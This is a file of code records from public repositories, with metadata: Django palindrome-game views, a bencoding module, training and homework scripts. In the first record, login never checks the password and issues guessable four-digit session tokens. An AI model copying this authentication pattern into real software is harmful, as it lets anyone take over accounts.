auth_obj.delete()\n\n user_obj = User.objects.filter(id = session_obj.user.id).first()\n user_obj.delete()\n return JsonResponse({'status': 'User Deleted Successfully'})\n \n else:\n return JsonResponse({'status': 'Invalid Request Method, Only POST Method is Allowed'})\n\ndef login_user(request):\n if request.method == 'POST':\n payload = json.loads(request.body)\n user_email = payload['email']\n user_password = payload['password']\n\n auth_obj = auth_user.objects.filter(email = user_email).first()\n if auth_obj is not None:\n user_obj = User.objects.filter(email = user_email).first()\n session_obj = Session.objects.filter(user = user_obj).first()\n if session_obj is None:\n token = randint(1000, 9999)\n data = {'token': token, 'status': True, 'user': user_obj}\n\n session_obj = Session()\n session_obj.to_db(data)\n session_obj.save()\n return JsonResponse({'status': 'User Logged in Successfully', 'token': token})\n \n else:\n if session_obj.status:\n return JsonResponse({'status': 'User Already Logged in'})\n else:\n session_obj.status = True\n session_obj.save()\n return JsonResponse({'status': 'User Logged in Successfully', 'token': session_obj.token})\n \n else:\n return JsonResponse({'status': 'User Does Not Exist'})\n \n else:\n return JsonResponse({'status': 'Invalid Request Method, Only POST Method is Allowed'})\n \ndef logout_user(request):\n if request.method == 'POST':\n token = request.headers['token']\n session_obj = get_session_obj(token)\n if check_session(session_obj):\n return JsonResponse({'status': 'User not Logged in'})\n else:\n session_obj.status = False\n session_obj.save()\n return JsonResponse({'status': 'User Logged out Successfully'})\n else:\n return JsonResponse({'status': 'Invalid Request Method, Only POST Method is Allowed'})\n\ndef check_palindrome(string):\n return string == string[::-1]\n\ndef start_game(request):\n if request.method == 'GET':\n token = request.headers['token']\n session_obj = get_session_obj(token)\n if check_session(session_obj):\n return JsonResponse({'status': 'User not Logged in'})\n else:\n game = Game.objects.filter(session = session_obj).first()\n if game is not None:\n game.status = False\n game.save()\n \n new_game = Game()\n new_game.session = session_obj\n new_game.save()\n return JsonResponse({'status':'Game Started Successfully'})\n \n else:\n return JsonResponse({'status': 'Invalid Request Method, Only GET Method is Allowed'})\n\ndef get_board(request):\n if request.method == 'GET':\n token = request.headers['token']\n session_obj = get_session_obj(token)\n if check_session(session_obj):\n return JsonResponse({'status': 'User not Logged in'})\n else:\n game_obj = Game.objects.filter(session = session_obj).first()\n return JsonResponse({'string': game_obj.game_string})\n \n else:\n return JsonResponse({'status': 'Invalid Request Method, Only GET Method is Allowed'})\n\ndef update_board(request):\n if request.method == 'POST':\n token = request.headers['token']\n session_obj = get_session_obj(token)\n if check_session(session_obj):\n return JsonResponse({'status': 'User not Logged in'})\n else:\n game_obj = Game.objects.filter(session = session_obj).first()\n if len(game_obj.game_string) == 6:\n is_palindrome = check_palindrome(game_obj.game_string)\n game_obj.is_palindrome = is_palindrome\n game_obj.save()\n return JsonResponse({'status': 'Game String is a Palindrome (Cannot Update the Board Anymore)' if is_palindrome else 'Game String is not a Palindrome (Cannot Update the Board Anymore)'})\n else:\n payload = json.loads(request.body)\n game_obj.game_string = game_obj.game_string + payload['char'][0]\n game_obj.save()\n return JsonResponse({'status': 'Updated Game Board'})\n \n else:\n return JsonResponse({'status': 'Invalid Request Method, Only POST Method is Allowed'})\n \ndef get_game_list(request):\n if request.method == 'GET':\n games = Game.objects.all()\n game_ids = []\n for each_game in games:\n print(each_game)\n game_ids.append(each_game.pk)\n return JsonResponse({'Games IDs': game_ids})\n else:\n return JsonResponse({'status': 'Invalid Request Method, Only GET Method is Allowed'})\n", "repo_name": "laminarss/palindrome-game-django", "sub_path": "project_palindrome/app_game/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7282, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.loads", "line_number": 18, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 23, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 23, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 25, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.create_user", "line_number": 27, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 27, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 32, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 34, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 37, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 44, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 46, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 50, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 53, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 60, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 62, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 62, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 62, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 67, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 70, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 74, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 78, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 78, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 78, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 83, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 89, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 93, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 97, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 100, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 103, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 110, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 114, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 116, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 126, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 136, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 139, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 146, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 149, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 152, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 159, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 166, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 168, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 171, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 174, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 183, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 185, "usage_type": "call"}]}
+{"seq_id": "28973881098", "text": "#readFromSql.py\nimport pandas as pd\nimport sqlalchemy as alc\nimport urllib\n\ndef getFromSql (tableName):\n params = urllib.parse.quote_plus(\n 'DRIVER={SQL Server};'+\n 'SERVER=DESKTOP-SQU7IEK;'+\n 'DATABASE=pfizer;'+\n 'Trusted_Connection=yes'\n )\n engine = alc.create_engine(\"mssql+pyodbc:///?odbc_connect=%s\" % params)\n\n df = pd.read_sql(tableName, con=engine)\n return df\n\n \n\n ", "repo_name": "PerlantidisStefanos/simple_flask_communication", "sub_path": "readFromSql.py", "file_name": "readFromSql.py", "file_ext": "py", "file_size_in_byte": 404, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "urllib.parse.quote_plus", "line_number": 7, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sqlalchemy.create_engine", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 15, "usage_type": "call"}]}
+{"seq_id": "19175112182", "text": "import typing\nfrom lbry.dht.error import DecodeError\n\n\ndef _bencode(data: typing.Union[int, bytes, bytearray, str, list, tuple, dict]) -> bytes:\n if isinstance(data, int):\n return b'i%de' % data\n elif isinstance(data, (bytes, bytearray)):\n return b'%d:%s' % (len(data), data)\n elif isinstance(data, str):\n return b'%d:%s' % (len(data), data.encode())\n elif isinstance(data, (list, tuple)):\n encoded_list_items = b''\n for item in data:\n encoded_list_items += _bencode(item)\n return b'l%se' % encoded_list_items\n elif isinstance(data, dict):\n encoded_dict_items = b''\n keys = data.keys()\n for key in sorted(keys):\n encoded_dict_items += _bencode(key)\n encoded_dict_items += _bencode(data[key])\n return b'd%se' % encoded_dict_items\n else:\n raise TypeError(f\"Cannot bencode {type(data)}\")\n\n\ndef _bdecode(data: bytes, start_index: int = 0) -> typing.Tuple[typing.Union[int, bytes, list, tuple, dict], int]:\n if data[start_index] == ord('i'):\n end_pos = data[start_index:].find(b'e') + start_index\n return int(data[start_index + 1:end_pos]), end_pos + 1\n elif data[start_index] == ord('l'):\n start_index += 1\n decoded_list = []\n while data[start_index] != ord('e'):\n list_data, start_index = _bdecode(data, start_index)\n decoded_list.append(list_data)\n return decoded_list, start_index + 1\n elif data[start_index] == ord('d'):\n start_index += 1\n decoded_dict = {}\n while data[start_index] != ord('e'):\n key, start_index = _bdecode(data, start_index)\n value, start_index = _bdecode(data, start_index)\n decoded_dict[key] = value\n return decoded_dict, start_index\n else:\n split_pos = data[start_index:].find(b':') + start_index\n try:\n length = int(data[start_index:split_pos])\n except (ValueError, TypeError) as err:\n raise DecodeError(err)\n start_index = split_pos + 1\n end_pos = start_index + length\n return data[start_index:end_pos], end_pos\n\n\ndef bencode(data: typing.Dict) -> bytes:\n if not isinstance(data, dict):\n raise TypeError()\n return _bencode(data)\n\n\ndef bdecode(data: bytes, allow_non_dict_return: typing.Optional[bool] = False) -> typing.Dict:\n assert isinstance(data, bytes), DecodeError(f\"invalid data type: {str(type(data))}\")\n\n if len(data) == 0:\n raise DecodeError('Cannot decode empty string')\n try:\n result = _bdecode(data)[0]\n if not allow_non_dict_return and not isinstance(result, dict):\n raise ValueError(f'expected dict, got {type(result)}')\n return result\n except (ValueError, TypeError) as err:\n raise DecodeError(err)\n", "repo_name": "lbryio/lbry-sdk", "sub_path": "lbry/dht/serialization/bencoding.py", "file_name": "bencoding.py", "file_ext": "py", "file_size_in_byte": 2839, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7218, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.Union", "line_number": 5, "usage_type": "attribute"}, {"api_name": "lbry.dht.error.DecodeError", "line_number": 52, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 28, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 28, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 58, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 64, "usage_type": "attribute"}, {"api_name": "lbry.dht.error.DecodeError", "line_number": 65, "usage_type": "call"}, {"api_name": "lbry.dht.error.DecodeError", "line_number": 68, "usage_type": "call"}, {"api_name": "lbry.dht.error.DecodeError", "line_number": 75, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 64, "usage_type": "attribute"}]}
+{"seq_id": "21757375059", "text": "# -*- coding:utf-8 -*-\n# author: hpf\n# create time: 2020/10/22 9:38\n# file: 111_二叉树的最小深度.py\n# IDE: PyCharm\n\n# 题目描述:\n# 给定一个二叉树,找出其最小深度。\n#\n# 最小深度是从根节点到最近叶子节点的最短路径上的节点数量。\n#\n# 说明: 叶子节点是指没有子节点的节点。\n#\n# 示例:\n#\n# 给定二叉树 [3,9,20,null,null,15,7],\n#\n# 3\n# / \\\n# 9 20\n# / \\\n# 15 7\n# 返回它的最小深度 2.\n\n# 解法一: BFS\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution1:\n def minDepth(self, root: TreeNode) -> int:\n if not root:\n return 0\n\n from collections import deque\n q = deque()\n\n # root本身就是一层,depth初始化为1\n q.append(root)\n depth = 1\n\n while(q):\n size = len(q)\n # 将当前队列中的所有节点向四周扩散\n for _ in range(size):\n node = q.popleft()\n # 判断是否到达终点\n if not node.left and not node.right:\n return depth\n # 将node的相邻节点��入队列\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n # 这里增加步数\n depth += 1\n\n return depth\n\n# 解法二: DFS\n\n# 先看使用 DFS(深度优先搜索)的方法,具体做法如下:\n#\n# 根节点为空,返回 0;\n# 如果根节点不为空,需要判断左右子节点:\n# 左右子节点都为空,那么返回 1;\n# 左右子节点其中一个为空,那么返回不为空子节点的最小深度;\n# 左右子节点均不为空,返回其中较小深度的值。\n\n\n\nclass Solution:\n def minDepth(self, root: TreeNode) -> int:\n # 根节点为空\n if not root:\n return 0\n # 根节点不为空,但不存在左右子节点,返回 1\n if not root.left and not root.right:\n return 1\n\n depth = 1\n\n # 返回不为空的右子节点最小深度\n if not root.left:\n depth += self.minDepth(root.right)\n # 不存在右子节点,返回不为空的左子节点最小深度\n elif not root.right:\n depth += self.minDepth(root.left)\n # 左右子节点均不为空,返回较小深度\n else:\n left_depth = self.minDepth(root.left)\n right_depth = self.minDepth(root.right)\n depth += min(left_depth, right_depth)\n\n return depth", "repo_name": "hpf0532/algorithms_demo", "sub_path": "leetcode/111_二叉树的最小深度.py", "file_name": "111_二叉树的最小深度.py", "file_ext": "py", "file_size_in_byte": 2702, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.deque", "line_number": 40, "usage_type": "call"}]}
+{"seq_id": "14474576552", "text": "# coding=utf-8\nimport mxnet as mx\nfrom mxnet import gluon, autograd\nimport gluoncv as gcv\nfrom model_zoo import east, EASTLoss, east_fpn\nfrom data.ic_data import text_detection_data\nfrom mxnet.gluon.data import DataLoader\nfrom mxnet.gluon import utils\nimport logging\nimport os, sys\nfrom mxboard import SummaryWriter\nimport numpy as np\nfrom mxnet import lr_scheduler as ls\n\nlogging.basicConfig(level=logging.INFO)\n\ndef main(train_dir, ctx=None, lr=0.0001, epoches=20, batch_size=16, checkpoint_path='model', debug=False):\n summ_writer = SummaryWriter(checkpoint_path)\n # dataloader\n ctx = eval(ctx)\n context = mx.gpu(ctx) if ctx > 0 else mx.cpu()\n ic_data = text_detection_data(image_dir=train_dir)\n ic_dataloader = DataLoader(dataset=ic_data, batch_size=batch_size, shuffle=True, num_workers=16)\n data_num = len(ic_dataloader) * batch_size\n # model\n east_model = east.EAST(nclass=2, text_scale=1024)\n # east_model = east(text_scale=1024)\n\n east_model.collect_params().initialize(init=mx.init.Xavier(), verbose=True, ctx=context)\n if not debug:\n east_model.hybridize()\n cos_shc = ls.PolyScheduler(max_update=ic_dataloader.length * epoches//batch_size, base_lr=lr)\n\n trainer = gluon.Trainer(east_model.collect_params(),\n 'sgd',\n {'learning_rate': lr,\n 'wd': 1e-5,\n 'momentum': 0.9,\n 'clip_gradient': 5,\n 'lr_scheduler':cos_shc}\n )\n EAST_loss = EASTLoss(cls_weight=0.01, iou_weight=1.0, angle_weight=20)\n step = 0\n lr_counter = 0\n lr_steps = [5, 10, 15, 20]\n lr_factor = 0.9\n\n for epoch in range(epoches):\n loss = []\n if epoch == lr_steps[lr_counter]:\n trainer.set_learning_rate(trainer.learning_rate*lr_factor)\n lr_counter += 1\n for i, batch_data in enumerate(ic_dataloader):\n im, score_map, geo_map, training_mask = map(lambda x: x.as_in_context(ctx), batch_data)\n\n with autograd.record(train_mode=True):\n\n f_score, f_geo = east_model(im)\n batch_loss = EAST_loss(score_map, f_score, geo_map, f_geo, training_mask)\n loss.append(batch_loss)\n batch_loss.backward()\n\n trainer.step(batch_size)\n # if i % 2 == 0:\n step = epoch * data_num + i * batch_size\n model_loss = np.mean(map(lambda x: x.asnumpy()[0], loss))\n summ_writer.add_scalar('model_loss', model_loss[0])\n logging.info(\"step: {}, loss: {}\".format(step, batch_loss.asnumpy()))\n ckpt_file = os.path.join(checkpoint_path, \"model_{}.params\".format(step))\n east_model.save_parameters(ckpt_file)\n logging.info(\"save model to {}\".format(ckpt_file))\n\nif __name__ == '__main__':\n train_dir = sys.argv[1]\n ckpt_path = sys.argv[2]\n ctxes = sys.argv[3]\n main(train_dir=train_dir, ctx=ctxes, checkpoint_path=ckpt_path, debug=True)\n", "repo_name": "saicoco/Gluon-EAST", "sub_path": "scripts/train_east.py", "file_name": "train_east.py", "file_ext": "py", "file_size_in_byte": 3058, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 15, "usage_type": "attribute"}, {"api_name": "mxboard.SummaryWriter", "line_number": 18, "usage_type": "call"}, {"api_name": "mxnet.gpu", "line_number": 21, "usage_type": "call"}, {"api_name": "mxnet.cpu", "line_number": 21, "usage_type": "call"}, {"api_name": "data.ic_data.text_detection_data", "line_number": 22, "usage_type": "call"}, {"api_name": "mxnet.gluon.data.DataLoader", "line_number": 23, "usage_type": "call"}, {"api_name": "model_zoo.east.EAST", "line_number": 26, "usage_type": "call"}, {"api_name": "model_zoo.east", "line_number": 26, "usage_type": "name"}, {"api_name": "mxnet.init.Xavier", "line_number": 29, "usage_type": "call"}, {"api_name": "mxnet.init", "line_number": 29, "usage_type": "attribute"}, {"api_name": "mxnet.lr_scheduler.PolyScheduler", "line_number": 32, "usage_type": "call"}, {"api_name": "mxnet.lr_scheduler", "line_number": 32, "usage_type": "name"}, {"api_name": "mxnet.gluon.Trainer", "line_number": 34, "usage_type": "call"}, {"api_name": "mxnet.gluon", "line_number": 34, "usage_type": "name"}, {"api_name": "model_zoo.EASTLoss", "line_number": 42, "usage_type": "call"}, {"api_name": "mxnet.autograd.record", "line_number": 56, "usage_type": "call"}, {"api_name": "mxnet.autograd", "line_number": 56, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 66, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 71, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 74, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 75, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 76, "usage_type": "attribute"}]}
+{"seq_id": "70183338728", "text": "from django import forms\nfrom .models import *\n\n\nclass BackupSearch(forms.Form):\n start_date = forms.DateField(required=False, widget=forms.DateInput(attrs={'type': 'date',\n 'class': 'width-100',\n 'required': False}))\n end_date = forms.DateField(required=False, widget=forms.DateInput(attrs={'type': 'date',\n 'class': 'width-100',\n 'required': False}))\n name = forms.CharField(required=False, widget=forms.DateInput(attrs={'class': 'width-100',\n 'required': False}))\n\n\nclass UploadBackupForm(forms.Form):\n # allow .zip files only\n file = forms.FileField(required=True, widget=forms.FileInput(attrs={'id': 'backup_field', 'accept': '.zip'}))\n\n\nclass CommentForm(forms.ModelForm):\n class Meta:\n model = Comment\n fields = ['body']\n widgets = {\n 'body': forms.Textarea(attrs={'rows': 1, 'cols': 115, 'placeholder': 'Add a comment...'})\n }\n labels = {k: \"\" for k in fields}\n", "repo_name": "Fingolfin7/SoftriteAPI", "sub_path": "backups/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1313, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.forms.Form", "line_number": 5, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 5, "usage_type": "name"}, {"api_name": "django.forms.DateField", "line_number": 6, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 6, "usage_type": "name"}, {"api_name": "django.forms.DateInput", "line_number": 6, "usage_type": "call"}, {"api_name": "django.forms.DateField", "line_number": 9, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 9, "usage_type": "name"}, {"api_name": "django.forms.DateInput", "line_number": 9, "usage_type": "call"}, {"api_name": "django.forms.CharField", "line_number": 12, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 12, "usage_type": "name"}, {"api_name": "django.forms.DateInput", "line_number": 12, "usage_type": "call"}, {"api_name": "django.forms.Form", "line_number": 16, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 16, "usage_type": "name"}, {"api_name": "django.forms.FileField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 18, "usage_type": "name"}, {"api_name": "django.forms.FileInput", "line_number": 18, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 21, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 26, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 26, "usage_type": "name"}]}
+{"seq_id": "6404845655", "text": "import config\nfrom util.BibleVerseParser import BibleVerseParser\n\nif config.pluginContext:\n config.mainWindow.showNoteEditor()\n parser = BibleVerseParser(config.parserStandarisation)\n verseList = parser.extractAllReferences(config.pluginContext, False)\n if not verseList:\n config.mainWindow.displayMessage(config.thisTranslation[\"message_noReference\"])\n else:\n content = \"; \".join([parser.bcvToVerseReference(*verse) for verse in verseList])\n\n if hasattr(config.mainWindow, \"noteEditor\"):\n content = \" {0} \".format(content)\n if config.mainWindow.noteEditor.noteEditor.html:\n config.mainWindow.noteEditor.noteEditor.editor.insertHtml(content)\n else:\n config.mainWindow.noteEditor.noteEditor.editor.insertPlainText(content)\n else:\n config.contextItem = content\n config.mainWindow.createNewNoteFile()\nelse:\n config.contextSource.messageNoSelection()\n", "repo_name": "eliranwong/UniqueBible", "sub_path": "plugins/context/Insert References into Note Editor.py", "file_name": "Insert References into Note Editor.py", "file_ext": "py", "file_size_in_byte": 992, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 104, "dataset": "github-code", "pt": "53", "api": [{"api_name": "config.pluginContext", "line_number": 4, "usage_type": "attribute"}, {"api_name": "config.mainWindow.showNoteEditor", "line_number": 5, "usage_type": "call"}, {"api_name": "config.mainWindow", "line_number": 5, "usage_type": "attribute"}, {"api_name": "util.BibleVerseParser.BibleVerseParser", "line_number": 6, "usage_type": "call"}, {"api_name": "config.parserStandarisation", "line_number": 6, "usage_type": "attribute"}, {"api_name": "config.pluginContext", "line_number": 7, "usage_type": "attribute"}, {"api_name": "config.mainWindow.displayMessage", "line_number": 9, "usage_type": "call"}, {"api_name": "config.mainWindow", "line_number": 9, "usage_type": "attribute"}, {"api_name": "config.thisTranslation", "line_number": 9, "usage_type": "attribute"}, {"api_name": "config.mainWindow", "line_number": 13, "usage_type": "attribute"}, {"api_name": "config.mainWindow", "line_number": 15, "usage_type": "attribute"}, {"api_name": "config.mainWindow.noteEditor.noteEditor.editor.insertHtml", "line_number": 16, "usage_type": "call"}, {"api_name": "config.mainWindow", "line_number": 16, "usage_type": "attribute"}, {"api_name": "config.mainWindow.noteEditor.noteEditor.editor.insertPlainText", "line_number": 18, "usage_type": "call"}, {"api_name": "config.mainWindow", "line_number": 18, "usage_type": "attribute"}, {"api_name": "config.contextItem", "line_number": 20, "usage_type": "attribute"}, {"api_name": "config.mainWindow.createNewNoteFile", "line_number": 21, "usage_type": "call"}, {"api_name": "config.mainWindow", "line_number": 21, "usage_type": "attribute"}, {"api_name": "config.contextSource.messageNoSelection", "line_number": 23, "usage_type": "call"}, {"api_name": "config.contextSource", "line_number": 23, "usage_type": "attribute"}]}
+{"seq_id": "72894779048", "text": "# -*- coding: utf-8 -*-\n\nimport numpy as np\nfrom sklearn import linear_model\n\n\nclass Regression:\n def __init__(self, lamb, m=1):\n self.lamb = lamb\n self.w = None\n self.M = m\n\n def fonction_base_polynomiale(self, x):\n \"\"\"\n Fonction de base qui projette la donnee x vers un espace polynomial tel que mentionne au chapitre 3.\n Si x est un scalaire, alors phi_x sera un vecteur à self.M dimensions : (x^1,x^2,...,x^self.M)\n Si x est un vecteur de N scalaires, alors phi_x sera un tableau 2D de taille NxM\n\n NOTE : En mettant phi_x = x, on a une fonction de base lineaire qui fonctionne pour une regression lineaire\n \"\"\"\n\n if np.isscalar(x):\n return x ** np.arange(self.M+1)\n\n return x[:, None] ** np.arange(self.M+1)\n\n def recherche_hyperparametre(self, X, t):\n \"\"\"\n Validation croisee de type \"k-fold\" pour k=10 utilisee pour trouver la meilleure valeur pour\n l'hyper-parametre self.M.\n\n Le resultat est mis dans la variable self.M\n\n X: vecteur de donnees\n t: vecteur de cibles\n \"\"\"\n # AJOUTER CODE ICI\n M_min = 1\n M_max = 201\n lamb_min = 0.0001\n lamb_max = 1\n lambs = list(np.geomspace(lamb_min, lamb_max, num=20))\n k = 10\n\n\n # Liste des items\n liste_indices = np.arange(len(X), dtype=np.int)\n # Pas nécéssaire de shuffle ?\n np.random.shuffle(liste_indices)\n\n # Split les indices en k \"chunks\"\n folds = np.array_split(liste_indices, 10)\n\n best_mean_error = np.inf\n\n for M in range(M_min, M_max):\n self.M = M\n\n for lamb in lambs:\n self.lamb = lamb\n\n erreur = np.zeros(k)\n for j in range(k):\n # Le chunk d'indices est celui de validation\n valid_indices = folds[j]\n # Les autres chunks serviront à l'entrainement\n train_indices = np.concatenate([f for i, f in enumerate(folds) if i != j])\n\n # Sélection des données\n x_valid = X[liste_indices[valid_indices]]\n t_valid = t[liste_indices[valid_indices]]\n x_train = X[liste_indices[train_indices]]\n t_train = t[liste_indices[train_indices]]\n\n # Entrainement et calcul d'erreur\n self.entrainement(x_train, t_train)\n pred_valid = np.array([self.prediction(x) for x in x_valid])\n erreur[j] = np.sum(self.erreur(t_valid, pred_valid))\n\n mean_error = np.mean(erreur)\n if mean_error <= best_mean_error:\n best_mean_error = mean_error\n best_M = M\n best_lamb = lamb\n\n self.M = best_M\n self.lamb = best_lamb\n print('M trouvé: {}'.format(self.M))\n print('lamb trouvé: {}'.format(self.lamb))\n\n def entrainement(self, X, t, using_sklearn=False):\n \"\"\"\n Entraîne la regression lineaire sur l'ensemble d'entraînement forme des\n entrees ``X`` (un tableau 2D Numpy, ou la n-ieme rangee correspond à l'entree\n x_n) et des cibles ``t`` (un tableau 1D Numpy ou le\n n-ieme element correspond à la cible t_n). L'entraînement doit\n utiliser le poids de regularisation specifie par ``self.lamb``.\n\n Cette methode doit assigner le champs ``self.w`` au vecteur\n (tableau Numpy 1D) de taille D+1, tel que specifie à la section 3.1.4\n du livre de Bishop.\n\n Lorsque using_sklearn=True, vous devez utiliser la classe \"Ridge\" de\n la librairie sklearn (voir http://scikit-learn.org/stable/modules/linear_model.html)\n\n Lorsque using_sklearn=Fasle, vous devez implementer l'equation 3.28 du\n livre de Bishop. Il est suggere que le calcul de ``self.w`` n'utilise\n pas d'inversion de matrice, mais utilise plutôt une procedure\n de resolution de systeme d'equations lineaires (voir np.linalg.solve).\n\n Aussi, la variable membre self.M sert à projeter les variables X vers un espace polynomiale de degre M\n (voir fonction self.fonction_base_polynomiale())\n\n NOTE IMPORTANTE : lorsque self.M <= 0, il faut trouver la bonne valeur de self.M\n\n \"\"\"\n\n # AJOUTER CODE ICI\n if self.M <= 0:\n self.recherche_hyperparametre(X, t)\n\n phi_X = self.fonction_base_polynomiale(X)\n\n if using_sklearn:\n reg = linear_model.Ridge(alpha=self.lamb, fit_intercept=False)\n reg.fit(phi_X, t)\n self.w = reg.coef_\n else:\n mat = self.lamb*np.identity(self.M+1) + np.dot(phi_X.T, phi_X)\n vec = np.dot(phi_X.T, t)\n self.w = np.linalg.solve(mat, vec)\n\n def prediction(self, x):\n \"\"\"\n Retourne la prediction de la regression lineaire\n pour une entree, representee par un tableau 1D Numpy ``x``.\n\n Cette methode suppose que la methode ``entrainement()``\n a prealablement ete appelee. Elle doit utiliser le champs ``self.w``\n afin de calculer la prediction y(x,w) (equation 3.1 et 3.3).\n \"\"\"\n # AJOUTER CODE ICI\n return np.dot(self.fonction_base_polynomiale(x), self.w)\n\n @staticmethod\n def erreur(t, prediction):\n \"\"\"\n Retourne l'erreur de la difference au carre entre\n la cible ``t`` et la prediction ``prediction``.\n \"\"\"\n # AJOUTER CODE ICI\n return (t-prediction)**2\n", "repo_name": "AntoineTheb/ift888", "sub_path": "Q1-pt2/solution_regression.py", "file_name": "solution_regression.py", "file_ext": "py", "file_size_in_byte": 5595, "program_lang": "python", "lang": "fr", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.isscalar", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.geomspace", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.random.shuffle", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.array_split", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 77, 